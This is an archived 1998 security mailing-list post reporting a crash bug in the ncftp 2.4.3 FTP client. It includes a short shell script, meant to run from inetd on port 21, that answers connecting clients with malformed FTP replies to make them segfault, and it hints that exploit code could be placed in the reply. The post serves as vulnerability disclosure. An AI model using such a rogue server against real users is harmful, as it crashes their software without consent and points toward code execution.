The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


ncftp 2.4.3 bug


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Sun, 21 Jun 1998 00:52:33 +0200
From: Paul Boehm <[email protected]>
To: [email protected]
Subject: ncftp 2.4.3 bug

Hi,

i think i've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to a ftp server that responds with something like the
shit below ncftp2.4.3 segfaults. i think this is exploitable,
but had no time/motivation to look further into it.

probably this isn't very dangerous anyway cause
your victim needs to connect willingly, and using ncftp to your server..
that won't happen very often unless
you've been talking with your victim before.

anyway i thought it may be a good idea to post it, so here it is:

--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by [email protected]
#   Start this using inetd. (port 21)

echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--

every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]

bye,
    paul

PS: i have no clue why this crashes ncftp... i haven't looked through
    ncftp's source, but maybe someone else will.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consulter.
    Email: [email protected]  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру